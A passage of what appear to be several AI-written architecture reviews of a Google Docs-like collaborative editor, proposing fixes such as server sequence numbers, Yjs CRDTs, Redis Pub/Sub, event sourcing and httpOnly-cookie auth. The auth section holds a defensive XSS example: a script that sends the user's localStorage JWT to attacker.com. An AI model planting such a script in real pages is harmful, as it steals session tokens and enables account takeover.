T6 (actual 10:00:06): User B types "Hello" (B's clock is accurate → stamps 10:00:06)

Server receives:
- Edit from A: timestamp=10:00:10, content="Hi"
- Edit from B: timestamp=10:00:06, content="Hello"

LWW resolution: A's edit wins (later timestamp)
Reality: B edited last, but loses
```
Solutions:
| Solution | Trade-offs |
|---|---|
| Server-assigned timestamps | +Eliminates clock skew, -Requires round-trip for every keystroke, -Increases latency |
| Hybrid: Client timestamp + server sequence number | +Tolerates clock skew, +Low latency, -Slightly more complex conflict resolution |
| Operational Transformation (OT) | +Handles concurrent edits correctly, -Complex implementation, -Difficult to debug |
| CRDT (Conflict-free RDT) | +Mathematically sound, +Works offline, -Higher memory usage, -Larger message sizes |
Recommended: Hybrid approach with server sequence numbers:
```javascript
// Client sends its timestamp; the server assigns the sequence
async function saveChange(docId, userId, change, clientTimestamp) {
  const serverSequence = await db.getNextSequence(docId);
  const serverTimestamp = Date.now();

  const changeRecord = {
    docId,
    userId,
    change,
    clientTimestamp,  // For audit/debugging only
    serverTimestamp,  // For ordering
    serverSequence    // Tiebreaker
  };

  // Conflict resolution uses (serverSequence, userId), not timestamps
  await db.saveChange(changeRecord);
  return { serverSequence, serverTimestamp };
}

// Conflict resolution
function resolveConflict(edit1, edit2) {
  // Use server sequence as source of truth
  if (edit1.serverSequence > edit2.serverSequence) return edit1;
  if (edit2.serverSequence > edit1.serverSequence) return edit2;
  // Tiebreaker: lexicographic on userId (deterministic)
  return edit1.userId < edit2.userId ? edit1 : edit2;
}
```
Problem: When two users edit overlapping content, one user's work is silently deleted.
Example:
Initial: "The quick brown fox"
User A (para 0-19): Replaces with "The fast brown fox"
User B (para 4-9): Replaces with "The slow brown fox"
With LWW on timestamp:
- If B's edit has later timestamp, result: "The slow brown fox"
- User A's "fast" is lost permanently
- No conflict warning shown to either user
Why it matters: Unacceptable in production. Users lose work without knowing.
Solutions:
| Solution | Trade-offs |
|---|---|
| Show conflict UI to users | +Explicit, -Interrupts flow, -Requires UX design |
| CRDT (Automerge/Yjs) | +Automatic sensible merges, +Offline support, -Significant rewrite |
| Operational Transform | +Proven (Google Docs), +Merges non-overlapping edits, -Complex, steep learning curve |
| Locking mechanism | +Prevents conflicts, -Reduces concurrency, -Degrades to pessimistic locking |
Recommended: CRDT with Yjs (minimal rewrite):
```javascript
// Replace full-snapshot storage with CRDT
import * as Y from 'yjs';

class DocumentManager {
  constructor(docId) {
    this.docId = docId;
    this.ydoc = new Y.Doc();
    this.ytext = this.ydoc.getText('shared');
  }

  // Load from DB
  async load() {
    const updates = await db.getYjsUpdates(this.docId);
    updates.forEach(u => Y.applyUpdate(this.ydoc, Buffer.from(u)));
  }

  // Local edit
  applyLocalChange(index, length, text) {
    this.ytext.delete(index, length);
    this.ytext.insert(index, text);
    // Serialize and broadcast
    const update = Y.encodeStateAsUpdate(this.ydoc);
    return update;
  }

  // Remote edit
  applyRemoteUpdate(update) {
    Y.applyUpdate(this.ydoc, update);
    // Yjs automatically merges non-overlapping edits;
    // overlapping edits use deterministic CRDT rules
  }

  // Periodic persistence
  async saveUpdate(update) {
    await db.saveYjsUpdate(this.docId, update);
  }
}
```
Problem: Cross-server synchronization via polling is fundamentally unscalable.
Math:
Bottleneck:
-- This query runs 50,000 times/second
SELECT * FROM changes
WHERE doc_id = ?
AND created_at > ?
ORDER BY created_at;
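The figure in the SQL comment above can be reproduced with a quick back-of-envelope calculation; the fleet and document counts below are illustrative assumptions, not numbers from the original description:

```javascript
// Each server polls once per open document every pollIntervalSec seconds.
function pollQps(servers, openDocsPerServer, pollIntervalSec) {
  return (servers * openDocsPerServer) / pollIntervalSec;
}

// e.g. 100 servers × 1,000 open documents each, polling every 2s:
console.log(pollQps(100, 1000, 2)); // 50000 queries/second against PostgreSQL
```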
Solutions:
| Solution | Trade-offs |
|---|---|
| Replace polling with Redis Pub/Sub | +O(1) message delivery, -Requires architectural change, -Redis becomes SPOF |
| Increase poll interval to 10s | +Reduces load, -Increases latency to 10s, -Unacceptable UX |
| Use database triggers + NOTIFY (PostgreSQL) | +Native, -Requires dedicated LISTEN connections, -Adds complexity |
| Event streaming (Kafka) | +Scalable, +Audit trail, -Operational overhead |
Recommended: Redis Pub/Sub (already in stack):
// Replace polling entirely
class SyncManager {
  constructor() {
    this.pubClient = redis.createClient();
    this.subClient = redis.createClient();
    // One listener for all channels; registering it inside
    // subscribeToDocument would stack a duplicate handler per document
    this.subClient.on('message', (channel, message) => {
      const docId = channel.slice('changes:'.length);
      const change = JSON.parse(message);
      this.broadcastToConnectedClients(docId, change);
    });
  }
  async subscribeToDocument(docId) {
    // Subscribe once per document per server
    await this.subClient.subscribe(`changes:${docId}`);
  }
  async publishChange(docId, change) {
    // Instant delivery to all servers
    await this.pubClient.publish(`changes:${docId}`,
      JSON.stringify(change)
    );
  }
}
// Remove polling code entirely
// Delete: setInterval(() => pollForChanges(), 2000);
Problem: User's edits between snapshots can be lost on server crash.
Scenario:
T0: Snapshot saved (user has typed "Hello")
T15: User types " World" (not yet in snapshot)
T20: Server crashes
T25: Server restarts, loads last snapshot
Result: " World" is lost
Risk: every server crash silently discards up to 30 seconds of edits for every document open on that server; across a fleet with regular deploys and occasional crashes, this is routine data loss, not an edge case.
Solutions:
| Solution | Trade-offs |
|---|---|
| Write-ahead log (WAL) for every change | +No data loss, -Disk I/O overhead, -Slower writes |
| Reduce snapshot interval to 5s | +Less data loss window, -6x more snapshots, -DB load increases |
| Event sourcing: store changes, not snapshots | +Perfect audit trail, -Requires replay on load, -Slower cold starts |
| Redis persistence (AOF) | +Fast, +Durable, -Adds Redis complexity |
Recommended: Event sourcing with periodic snapshots:
// Store individual changes, not snapshots
async function saveChange(docId, change, version) {
  await db.query(
    `INSERT INTO changes (doc_id, change_data, version, created_at)
     VALUES ($1, $2, $3, NOW())`,
    [docId, JSON.stringify(change), version]
  );
  // Create a snapshot every 100 changes; checking the monotonically
  // increasing version avoids a COUNT(*) scan on every write
  if (version % 100 === 0) {
    await createSnapshot(docId);
  }
}
// Load document efficiently
async function loadDocument(docId) {
// Get latest snapshot
const snapshot = await db.query(
`SELECT content, version FROM snapshots
WHERE doc_id = $1
ORDER BY version DESC LIMIT 1`,
[docId]
);
// Replay changes since snapshot
const changes = await db.query(
`SELECT change_data, version FROM changes
WHERE doc_id = $1 AND version > $2
ORDER BY version`,
[docId, snapshot.rows[0]?.version || 0]
);
// Reconstruct document
let doc = snapshot.rows[0]?.content || {};
changes.rows.forEach(row => {
doc = applyChange(doc, JSON.parse(row.change_data));
});
return doc;
}
Problem: Multiple authorization vulnerabilities.
Issue 1: localStorage is XSS-vulnerable
// Attacker injects script via malicious document content
<script>
fetch('https://attacker.com?token=' + localStorage.getItem('jwt'));
</script>
Issue 2: 5-minute API cache with stale auth
T0: User logs in, gets JWT (valid)
T1: Admin revokes user's access in database
T2: User makes request (still cached, bypasses auth check)
T3: Request succeeds with revoked permissions
Issue 3: 24-hour token expiry is too long
Solutions:
| Solution | Trade-offs |
|---|---|
| httpOnly cookies + CSRF tokens | +Immune to XSS for token theft, -Requires CSRF protection, -Slightly more complex |
| Short-lived tokens (15 min) + refresh tokens | +Reduces window of compromise, -More refresh requests, -Requires refresh token storage |
| Remove API caching for auth-required endpoints | +Always enforces current permissions, -Increases load, -Reduces performance |
| Token revocation list (Redis) | +Instant revocation, -Redis lookup per request, -Cache invalidation complexity |
Recommended: httpOnly cookies + short-lived tokens + Redis revocation:
// Auth middleware
async function authMiddleware(req, res, next) {
const token = req.cookies.jwt; // httpOnly cookie
if (!token) return res.status(401).json({ error: 'Unauthorized' });
try {
const decoded = jwt.verify(token, SECRET, {
algorithms: ['HS256'],
issuer: 'https://yourdomain.com',
audience: 'api'
});
// Check revocation list
const isRevoked = await redis.get(`revoked:${decoded.jti}`);
if (isRevoked) {
return res.status(401).json({ error: 'Token revoked' });
}
req.user = decoded;
next();
} catch (err) {
return res.status(401).json({ error: 'Invalid token' });
}
}
// Login endpoint
app.post('/login', async (req, res) => {
const user = await authenticateUser(req.body);
const token = jwt.sign(
{
sub: user.id,
jti: crypto.randomUUID() // Unique token ID for revocation
},
SECRET,
{
expiresIn: '15m', // Short expiry
issuer: 'https://yourdomain.com',
audience: 'api'
}
);
const refreshToken = jwt.sign(
{ sub: user.id },
REFRESH_SECRET,
{ expiresIn: '7d' }
);
res.cookie('jwt', token, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
res.cookie('refreshToken', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000
});
res.json({ success: true });
});
// Logout endpoint
app.post('/logout', async (req, res) => {
  const token = req.cookies.jwt;
  const decoded = token && jwt.decode(token);
  // Revoke token immediately (guard against a missing/garbled cookie)
  if (decoded?.jti) {
    await redis.setex(`revoked:${decoded.jti}`, 15 * 60, '1');
  }
  res.clearCookie('jwt');
  res.clearCookie('refreshToken');
  res.json({ success: true });
});
// Refresh token endpoint
app.post('/refresh', (req, res) => {
const refreshToken = req.cookies.refreshToken;
try {
const decoded = jwt.verify(refreshToken, REFRESH_SECRET);
const newToken = jwt.sign(
{ sub: decoded.sub, jti: crypto.randomUUID() },
SECRET,
{ expiresIn: '15m' }
);
res.cookie('jwt', newToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
res.json({ success: true });
} catch (err) {
res.status(401).json({ error: 'Invalid refresh token' });
}
});
Problem: Caching API responses breaks real-time collaboration.
Scenario:
T0: User A requests document state → Server returns "Hello"
T1: User B edits document to "Hello World"
T2: User A refreshes page within 5 minutes
T3: CloudFront returns cached "Hello" (stale data)
T4: User A continues editing from stale state
T5: Conflict when both edits merge
Solutions:
| Solution | Trade-offs |
|---|---|
| Remove API caching entirely (Cache-Control: no-cache) | +Always fresh, -Increases origin load, -Slower for read-heavy workloads |
| Separate CDN for static assets only | +Caches CSS/JS, -Doesn't cache API, -More complex routing |
| Cache API by document version | +Can cache longer, -Invalidation complexity, -Requires version headers |
| Use Cache-Control: private, max-age=0 | +Browser still caches, -CDN doesn't cache, -Minimal benefit |
Recommended: Separate CDN tiers:
// Static assets (cacheable)
app.use(express.static('public', {
setHeaders: (res, path) => {
if (path.endsWith('.js') || path.endsWith('.css')) {
res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
// Include hash in filename for cache busting
}
}
}));
// API endpoints (not cacheable)
app.get('/api/documents/:docId', (req, res) => {
res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
res.setHeader('Pragma', 'no-cache');
res.setHeader('Expires', '0');
// Return document
});
// CloudFront configuration
// - Whitelist only static asset paths for caching
// - API paths bypass cache entirely
// - Use separate behaviors for different path patterns
Problem: Current LWW is too naive for real-time collaboration.
Document: "abcdef"
User A: Delete "c" (index 2) → "abdef"
User B: Insert "X" at index 3 → "abcXdef"
What should happen? Both replicas must converge, but naive index-based application is order-dependent:
- If A's delete applies first ("abdef"), B's untransformed insert at index 3 yields "abdXef"
- If B's insert applies first ("abcXdef"), A's untransformed delete at index 2 yields "abXdef"
LWW sidesteps the divergence by discarding one edit wholesale
Solutions:
| Solution | Trade-offs |
|---|---|
| Implement OT (Operational Transform) | +Battle-tested (Google Docs), +Handles overlapping edits, -Complex (200+ LOC minimum), -Difficult to debug |
| Use CRDT library (Yjs/Automerge) | +Automatic merging, +Offline support, +Simpler than OT, -Larger message sizes, -Memory overhead |
| Pessimistic locking | +Prevents conflicts, -Reduces concurrency, -Poor UX (users wait for locks) |
Recommended: Yjs (already mentioned in #3, but critical enough to restate):
// With Yjs, this just works: two replicas edit concurrently, then sync
const docA = new Y.Doc();
const docB = new Y.Doc();
docA.getText('content').insert(0, 'abcdef');
Y.applyUpdate(docB, Y.encodeStateAsUpdate(docA)); // B starts in sync
// Concurrent edits on separate replicas
docA.getText('content').delete(2, 1);   // User A deletes "c"
docB.getText('content').insert(3, 'X'); // User B inserts "X" after "c"
// Exchange updates in either order
Y.applyUpdate(docB, Y.encodeStateAsUpdate(docA));
Y.applyUpdate(docA, Y.encodeStateAsUpdate(docB));
// Both replicas converge to "abXdef" (deterministic, both edits preserved)
Problem: Users don't know who else is editing or where.
Risks:
Solutions:
| Solution | Trade-offs |
|---|---|
| Cursor presence via WebSocket | +Real-time, +Low latency, -Requires tracking per connection |
| Activity log in sidebar | +Shows recent edits, -Not real-time, -Requires polling |
| Collaborative cursors library | +Battle-tested, +Integrates with CRDT, -Adds dependencies |
Recommended: Yjs with y-protocols for awareness:
import * as Y from 'yjs';
import * as awarenessProtocol from 'y-protocols/awareness';
const ydoc = new Y.Doc();
// Awareness is a separate object layered on the doc, not a Y.Doc property
const awareness = new awarenessProtocol.Awareness(ydoc);
// Broadcast local state
awareness.setLocalState({
  user: {
    name: currentUser.name,
    color: currentUser.color,
    clientID: ydoc.clientID
  },
  cursor: {
    anchor: 0,
    head: 5
  }
});
// Listen for remote changes; the event reports added/updated/removed client IDs
awareness.on('change', ({ added, updated, removed }) => {
  for (const clientID of [...added, ...updated]) {
    const state = awareness.getStates().get(clientID);
    if (state) {
      renderRemoteCursor(clientID, state.cursor);
    }
  }
  removed.forEach(clientID => removeRemoteCursor(clientID));
});
Problem: Users lose connection → edits are lost.
Solutions:
| Solution | Trade-offs |
|---|---|
| Local storage queue + retry | +Simple, -Manual sync logic, -Data loss on browser crash |
| Service Worker + IndexedDB | +Works offline, +Syncs on reconnect, -Browser storage limits, -Complexity |
| CRDT with local persistence | +Automatic sync, +Works offline, +Yjs has built-in support, -Larger payload |
Recommended: Yjs with IndexedDB persistence:
import * as Y from 'yjs';
import { IndexeddbPersistence } from 'y-indexeddb';
const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');
const persistence = new IndexeddbPersistence('document-id', ydoc);
persistence.whenSynced.then(() => {
  console.log('Loaded from IndexedDB');
});
// Works offline: edits are stored in IndexedDB
ytext.insert(0, 'offline edit');
// On reconnect: a network provider (e.g. y-websocket) syncs automatically
Problem: User reconnects → routed to different server → loses WebSocket state.
Scenario:
Request 1: User A → Load Balancer → Server 1 (WebSocket connected)
Request 2: User A → Load Balancer → Server 2 (no WebSocket state)
Result: User A's edits don't broadcast to their own clients
Solutions:
| Solution | Trade-offs |
|---|---|
| Sticky sessions (IP hash or cookie) | +Keeps user on same server, -Uneven load distribution, -Server failures lose connections |
| Shared session store (Redis) | +Load balancer can distribute freely, +Server failures don't lose state, -Redis lookup per request |
| WebSocket gateway (e.g., Socket.io) | +Handles reconnection, +Automatic load balancing, -Additional latency |
Recommended: Sticky sessions + Redis fallback:
# Nginx config
upstream api_servers {
    ip_hash;  # Route based on client IP
    server api1.internal:3000;
    server api2.internal:3000;
    server api3.internal:3000;
}
// Node.js: Store WebSocket metadata in Redis
const wsClients = new Map(); // Local cache
io.on('connection', async (socket) => {
  const userId = socket.handshake.auth.userId;
  const serverId = process.env.SERVER_ID;
  // Track locally
  wsClients.set(userId, socket);
  // Also store in Redis for failover
  await redis.setex(
    `ws:${userId}`,
    3600,
    JSON.stringify({ serverId, socketId: socket.id })
  );
  socket.on('disconnect', async () => {
    wsClients.delete(userId);
    await redis.del(`ws:${userId}`);
  });
});
// Broadcast to user (works across servers)
async function broadcastToUser(userId, message) {
// Try local first
const localSocket = wsClients.get(userId);
if (localSocket) {
localSocket.emit('update', message);
return;
}
// Check Redis for user's server
const wsInfo = await redis.get(`ws:${userId}`);
if (wsInfo) {
const { serverId } = JSON.parse(wsInfo);
// Publish to that server's Redis channel
await redis.publish(`user:${userId}:${serverId}`, JSON.stringify(message));
}
}
Problem: Malicious user can spam edits → DoS.
Attacker: Send 1000 edits/second
Result: Database overloaded, all users experience lag
Solutions:
| Solution | Trade-offs |
|---|---|
| Token bucket per user | +Fair, +Configurable, -Requires tracking per user |
| Redis rate limiter | +Fast, +Distributed, -Redis lookup per request |
| Adaptive rate limiting | +Responds to load, -More complex |
Recommended: Redis fixed-window counter (a simple stand-in for a full token bucket):
async function checkRateLimit(userId, docId) {
const key = `ratelimit:${userId}:${docId}`;
const limit = 100; // 100 edits per minute
const window = 60;
  const current = await redis.incr(key);
  if (current === 1) {
    // Set the window on first increment; in production wrap INCR+EXPIRE
    // in a Lua script so a crash can't leave the key without a TTL
    await redis.expire(key, window);
  }
if (current > limit) {
throw new Error('Rate limit exceeded');
}
}
// Use in edit handler
io.on('connection', (socket) => {
socket.on('edit', async (data) => {
try {
await checkRateLimit(socket.userId, data.docId);
await handleEdit(data);
} catch (err) {
socket.emit('error', { message: 'Rate limit exceeded' });
}
});
});
Problem: Can't answer "who changed what when" or recover from mistakes.
Solutions:
| Solution | Trade-offs |
|---|---|
| Store all changes in audit table | +Complete history, +Can restore any version, -Storage overhead |
| Event sourcing | +Audit trail is primary source, +Can replay, -Architectural change |
| Immutable log (Kafka) | +Durable, +Scalable, -Operational complexity |
Recommended: Audit table (simple):
async function saveChange(docId, change, userId) {
const changeId = crypto.randomUUID();
await db.query(
`INSERT INTO document_changes
(id, doc_id, user_id, change_data, created_at)
VALUES ($1, $2, $3, $4, NOW())`,
[changeId, docId, userId, JSON.stringify(change)]
);
return changeId;
}
// Query audit trail
async function getHistory(docId, limit = 100) {
return db.query(
`SELECT id, user_id, change_data, created_at
FROM document_changes
WHERE doc_id = $1
ORDER BY created_at DESC
LIMIT $2`,
[docId, limit]
);
}
// Restore to specific point
async function restoreToVersion(docId, changeId) {
const changes = await db.query(
`SELECT change_data FROM document_changes
WHERE doc_id = $1 AND created_at <=
(SELECT created_at FROM document_changes WHERE id = $2)
ORDER BY created_at`,
[docId, changeId]
);
let doc = {};
changes.rows.forEach(row => {
doc = applyChange(doc, JSON.parse(row.change_data));
});
return doc;
}
Problem: What if two users rename the same document simultaneously?
Solutions: treat metadata like content. Server-assigned LWW is acceptable for low-stakes fields like titles; for stricter behavior, use optimistic concurrency with a version column and surface a "reload and retry" error on mismatch.
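One common approach is optimistic concurrency control; the sketch below assumes a `documents` table with a `version` column and a node-postgres-style `db.query` interface:

```javascript
// Hypothetical optimistic-concurrency rename: the UPDATE succeeds only if
// the row still has the version this client read. A concurrent rename bumps
// the version first, so the second writer matches zero rows and must retry.
async function renameDocument(db, docId, newTitle, expectedVersion) {
  const result = await db.query(
    `UPDATE documents
        SET title = $1, version = version + 1
      WHERE id = $2 AND version = $3
      RETURNING version`,
    [newTitle, docId, expectedVersion]
  );
  if (result.rows.length === 0) {
    throw new Error('Conflict: document was renamed concurrently; reload and retry');
  }
  return result.rows[0].version; // the new version to show the client
}
```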
Problem: User reads stale data from replica.
Solutions: route reads that immediately follow a user's own write to the primary ("read your writes"), or have clients send their last-seen version/LSN so a replica serves the request only once it has caught up. Trade-off: more primary load or added read latency.
Problem: Database corruption → all documents lost.
Solutions: continuous WAL archiving with point-in-time recovery (e.g., pgBackRest or WAL-G), cross-region backup copies, and regular restore drills. Trade-off: storage cost and ongoing operational discipline.
| Issue | Severity | Root Cause | Recommended Fix | Effort |
|---|---|---|---|---|
| Split-brain sync | CRITICAL | No inter-server messaging | Redis Pub/Sub | Medium |
| Client clock skew | CRITICAL | Client-side timestamps | Server sequence numbers | Low |
| LWW data loss | CRITICAL | Naive conflict resolution | CRDT (Yjs) | High |
| Polling scalability | CRITICAL | 50k QPS polling | Redis Pub/Sub | Medium |
| Snapshot data loss | CRITICAL | 30s window | Event sourcing | Medium |
| Auth bypass | CRITICAL | localStorage + cache | httpOnly + short-lived tokens | Medium |
| API caching | CRITICAL | CloudFront on dynamic data | Separate static/API CDN | Low |
| No OT/CRDT | MAJOR | Naive conflict resolution | Yjs library | High |
| No offline support | MAJOR | Missing persistence | IndexedDB + Yjs | Medium |
| Sticky sessions | MAJOR | Round-robin LB | IP hash + Redis | Low |
| No rate limiting | MAJOR | Missing limits | Redis token bucket | Low |
| No audit trail | MAJOR | Missing logging | Audit table | Low |
The architecture needs a complete overhaul of the sync/conflict resolution layer. Start with Redis Pub/Sub + Yjs CRDT, then address auth and persistence.
I'll analyze this architecture systematically, identifying critical issues and proposing solutions.
Issue: Changes are only broadcast to clients connected to the same server. Users on different servers experience 2+ second delays.
Solution: Implement Redis Pub/Sub or a message queue (RabbitMQ/Kafka)
// Current problem
server1.broadcast(change); // Only server1 clients see this immediately
// Solution
redis.publish('doc:123:changes', change); // All servers receive instantly
Trade-offs: instant cross-server delivery with O(1) fan-out, but the broker becomes an extra dependency and potential single point of failure.
Issue: Client clocks can differ by seconds or minutes, making last-write-wins unreliable.
Solution: Use Hybrid Logical Clocks (HLC) or server-assigned timestamps
// Problem
{ text: "Hello", timestamp: clientTime } // Client A: 14:30:00
{ text: "World", timestamp: clientTime } // Client B: 14:29:55 (clock behind)
// Solution with HLC
{ text: "Hello", hlc: { time: serverTime, counter: 1, clientId: "A" }}
Trade-offs: preserves causal ordering despite client clock drift, at the cost of extra timestamp metadata on every operation.
Issue: 30-second save intervals risk losing up to 30 seconds of work.
Solution: Implement a write-ahead log (WAL) with operation-based storage
// Store operations immediately
operations: [
{ op: 'insert', pos: 45, text: 'Hello', timestamp: ... },
{ op: 'delete', pos: 50, length: 5, timestamp: ... }
]
// Snapshot periodically for performance
Trade-offs: shrinks the data-loss window to near zero, but every keystroke becomes a durable write and loads must replay operations since the last snapshot.
Issue: N servers polling every 2 seconds = N queries/2 seconds, multiplied across open documents.
Solution: Replace with PostgreSQL LISTEN/NOTIFY or change data capture (CDC)
-- Real-time notifications
NOTIFY document_changes, '{"docId": 123, "change": {...}}';
-- Or use logical replication/CDC tools like Debezium
Trade-offs: eliminates polling load, but NOTIFY payloads are size-limited and each server needs a dedicated listener connection.
Issue: Paragraph-level last-write-wins loses collaborative edits.
Solution: Implement OT or CRDTs (Conflict-free Replicated Data Types)
// Current: entire paragraph replaced
User A: "The quick brown fox"
User B: "The quick brown fox jumps"
Result: One user's changes lost
// With OT: operations transformed
Op A: insert(4, "very ")
Op B: insert(19, " jumps")
Result: "The very quick brown fox jumps"
Trade-offs: both users' edits survive concurrent editing, but transform functions are complex to implement correctly and to test.
Issue: No reconnection strategy; the load balancer may route reconnections to different servers.
Solution: Implement sticky sessions or connection-state management
// Connection state in Redis
redis.hset(`user:${userId}:connections`, {
serverId: 'server-1',
docId: 123,
lastSeenOperation: 456
});
// On reconnect, route to same server or sync state
Trade-offs: reconnects resume cleanly, but sticky routing skews load and the Redis connection state must be kept fresh.
Issue: 24-hour expiry in localStorage is vulnerable to XSS; no refresh mechanism.
Solution: Shorter-lived tokens with refresh tokens in httpOnly cookies
// Access token: 15 minutes, memory only
// Refresh token: 7 days, httpOnly cookie
// Implement token rotation on refresh
Trade-offs: a stolen access token is useful for only minutes, at the cost of refresh round-trips and rotation logic.
Issue: 5-minute API cache can serve stale document data.
Solution: Implement cache tags and targeted invalidation
// Tag responses
res.headers['Cache-Tag'] = `doc-${docId}`;
// Invalidate on changes
cdn.purge({ tags: [`doc-${docId}`] });
Trade-offs: precise invalidation with longer cache lifetimes, but tag-based purging is CDN-specific and purges propagate with some delay.
Issue: Every keystroke writes to PostgreSQL.
Solution: Buffer changes in Redis, batch-write to PostgreSQL
// Buffer in Redis
redis.lpush(`doc:${docId}:pending`, change);
// Batch write every 100ms or 10 operations
const batch = await redis.lrange(`doc:${docId}:pending`, 0, -1);
await redis.del(`doc:${docId}:pending`); // clear the buffer once drained
await postgres.insertBatch(batch); // placeholder for a multi-row INSERT
Trade-offs: drastically fewer database writes, but operations buffered in Redis can be lost if Redis fails before the batch is flushed.
Issue: Users can't see who else is editing.
Solution: Implement a presence system with cursor positions
// Track active users and cursor positions
presence: {
users: {
'user1': { cursor: 145, selection: null, color: '#FF5733' },
'user2': { cursor: 89, selection: [89, 94], color: '#33FF57' }
}
}
Trade-offs: users can avoid editing collisions, but every cursor move generates small broadcast messages.
This architecture would be suitable for small-scale use but needs these fundamental changes to scale reliably for a production Google Docs-like system.
Problem: Users connected to different API servers experience 2+ second delays due to polling mechanism, creating divergent document states and poor collaboration experience.
Solution: Implement Redis Pub/Sub or dedicated message broker (RabbitMQ/Kafka)
Problem: Client clock differences cause incorrect last-write-wins resolution, potentially losing recent edits.
Solution: Hybrid Vector Clocks + Server Timestamps
{
serverTimestamp: 1234567890,
vectorClock: {userId1: 5, userId2: 3},
operation: {...}
}
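Given clocks in the shape above, "concurrent vs. causally ordered" can be decided by pairwise comparison; a minimal sketch (field names assumed to match the JSON above):

```javascript
// Compare two vector clocks. If each is ahead on some key, the operations
// are concurrent and need a real merge rather than last-write-wins.
function compareVectorClocks(a, b) {
  const keys = new Set([...Object.keys(a), ...Object.keys(b)]);
  let aAhead = false, bAhead = false;
  for (const k of keys) {
    const av = a[k] || 0, bv = b[k] || 0;
    if (av > bv) aAhead = true;
    if (bv > av) bAhead = true;
  }
  if (aAhead && bAhead) return 'concurrent'; // needs merge, not LWW
  if (aAhead) return 'after';
  if (bAhead) return 'before';
  return 'equal';
}
```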
Problem: System crash or network partition can lose up to 30 seconds of work.
Solution: Implement Operation Log with Checkpointing
Problem: Server crash causes all clients to reconnect simultaneously, overwhelming remaining servers.
Solution: Exponential Backoff with Jitter + Connection Pooling
reconnectDelay = Math.min(baseDelay * Math.pow(2, attempt) + Math.random() * 1000, maxDelay)
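Wrapped as a function, with assumed base-delay and cap values; the jitter spreads reconnect attempts so a crashed server's clients don't stampede the survivors:

```javascript
// Exponential backoff with jitter; baseDelay/maxDelay defaults are assumptions.
function reconnectDelay(attempt, baseDelay = 500, maxDelay = 30000) {
  const jitter = Math.random() * 1000; // de-synchronize reconnecting clients
  return Math.min(baseDelay * Math.pow(2, attempt) + jitter, maxDelay);
}
```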
Problem: Concurrent edits to same paragraph with last-write-wins causes character-level corruption.
Solution: Implement Proper OT or CRDT (Yjs/Automerge)
Problem: All changes funnel through single master database, limiting throughput.
Solution: Write-Through Cache + Async Batch Writes
// Buffer operations in Redis, batch write to PostgreSQL
await redis.lpush(`doc:${docId}:ops`, operation);
// Background job processes queue every 100ms or 100 operations
Problem: localStorage tokens vulnerable to XSS, no refresh mechanism, 24-hour window too long.
Solution: httpOnly Cookies + Refresh Token Pattern
Problem: 5-minute API response caching can serve stale document data.
Solution: Cache-Control Headers + Versioned Endpoints
Cache-Control: private, max-age=0, must-revalidate
ETag: "document-version-hash"
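The headers above amount to a conditional-GET check; a minimal sketch as a pure function, kept free of framework wiring (field names are assumptions):

```javascript
// Decide between 200-with-body and 304 based on the document's version hash.
function conditionalResponse(docVersion, ifNoneMatchHeader) {
  const etag = `"doc-v${docVersion}"`;
  if (ifNoneMatchHeader === etag) {
    return { status: 304, etag }; // client copy is current; skip the body
  }
  return { status: 200, etag }; // send fresh body plus the new ETag
}
```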
Problem: Large organizations create hotspots, limiting scalability.
Solution: Consistent Hashing with Virtual Nodes
Problem: Users can't see who else is editing, leading to conflicts.
Solution: Cursor Position Broadcasting + Presence Service
Each fix should be implemented incrementally with feature flags for safe rollout and rollback capability.
This architecture has several critical issues that will cause data loss, poor user experience, and scaling problems. Let me analyze each systematically.
The Problem: Using client clocks for conflict resolution is fundamentally broken. Client clocks can be wrong by hours, days, or even years.
Timeline (Server Time):
10:00:00 - Alice types "Hello" (Alice's clock says 15:00:00)
10:00:01 - Bob types "World" (Bob's clock says 09:00:00)
Result: Alice's edit wins because 15:00:00 > 09:00:00
Bob's edit is silently discarded, even though it came AFTER Alice's
Real-world scenarios that break this:
Solution: Hybrid Logical Clocks (HLC) or Server-Assigned Lamport Timestamps
// Hybrid Logical Clock implementation
interface HLC {
wallTime: number; // Physical time from server
logical: number; // Logical counter for ordering
nodeId: string; // Tie-breaker for simultaneous events
}
class HybridLogicalClock {
private wallTime: number = 0;
private logical: number = 0;
private nodeId: string;
constructor(nodeId: string) {
this.nodeId = nodeId;
}
// Called when sending an event
tick(): HLC {
const now = Date.now();
if (now > this.wallTime) {
this.wallTime = now;
this.logical = 0;
} else {
this.logical++;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Called when receiving an event
receive(remote: HLC): HLC {
const now = Date.now();
if (now > this.wallTime && now > remote.wallTime) {
this.wallTime = now;
this.logical = 0;
} else if (this.wallTime > remote.wallTime) {
this.logical++;
} else if (remote.wallTime > this.wallTime) {
this.wallTime = remote.wallTime;
this.logical = remote.logical + 1;
} else {
// Equal wall times
this.logical = Math.max(this.logical, remote.logical) + 1;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Compare two HLCs
static compare(a: HLC, b: HLC): number {
if (a.wallTime !== b.wallTime) return a.wallTime - b.wallTime;
if (a.logical !== b.logical) return a.logical - b.logical;
return a.nodeId.localeCompare(b.nodeId);
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HLC | Preserves causality, tolerates clock drift | Slightly more complex, ~24 bytes per timestamp |
| Server timestamps only | Simple | Doesn't capture happens-before relationships |
| Vector clocks | Perfect causality tracking | O(n) space where n = number of clients |
The Problem: When two users edit the same paragraph, one user's work is completely discarded.
Original paragraph: "The quick brown fox"
Alice (10:00:00): Changes to "The quick brown fox jumps"
Bob (10:00:01): Changes to "The slow brown fox"
Result: "The slow brown fox"
Alice's addition of "jumps" is silently lost
Solution: Operational Transformation (OT) or CRDTs
For a Google Docs-like experience, OT is the industry standard:
// Operational Transformation for text
type Operation =
| { type: 'retain'; count: number }
| { type: 'insert'; text: string }
| { type: 'delete'; count: number };
class OTDocument {
private content: string = '';
private revision: number = 0;
// Transform operation A against operation B
// Returns A' such that apply(apply(doc, B), A') === apply(apply(doc, A), B')
static transform(a: Operation[], b: Operation[]): [Operation[], Operation[]] {
const aPrime: Operation[] = [];
const bPrime: Operation[] = [];
let indexA = 0, indexB = 0;
let opA = a[indexA], opB = b[indexB];
while (opA || opB) {
